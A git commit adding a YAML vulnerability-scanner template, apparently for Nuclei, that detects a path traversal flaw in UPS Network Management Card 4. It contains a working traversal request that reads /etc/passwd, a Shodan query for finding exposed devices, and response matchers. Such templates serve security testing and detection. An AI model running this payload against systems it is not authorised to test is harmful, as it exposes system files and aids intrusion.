Merge pull request #9395 from Kazgangap/ups

ups network lfi add
2024-03-22 21:39:53 +05:30 · 2024-03-22 21:39:53 +05:30 · ef240bf9a0
parent cb61944fc7 60b02a0013
commit ef240bf9a0
1 changed files with 37 additions and 0 deletions
--- a/http/vulnerabilities/other/ups-network-lfi.yaml
+++ b/http/vulnerabilities/other/ups-network-lfi.yaml
@ -0,0 +1,37 @@
+id: ups-network-lfi
+
+info:
+  name: UPS Network Management Card 4 Path Traversal
+  author: Kazgangap
+  severity: high
+  description: |
+    UPS Network Management Card version 4 suffers from a path traversal vulnerability.
+  reference:
+    - https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt
+    - https://www.exploit-db.com/exploits/51897
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"UPS Network Management Card 4"
+  tags: ups,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200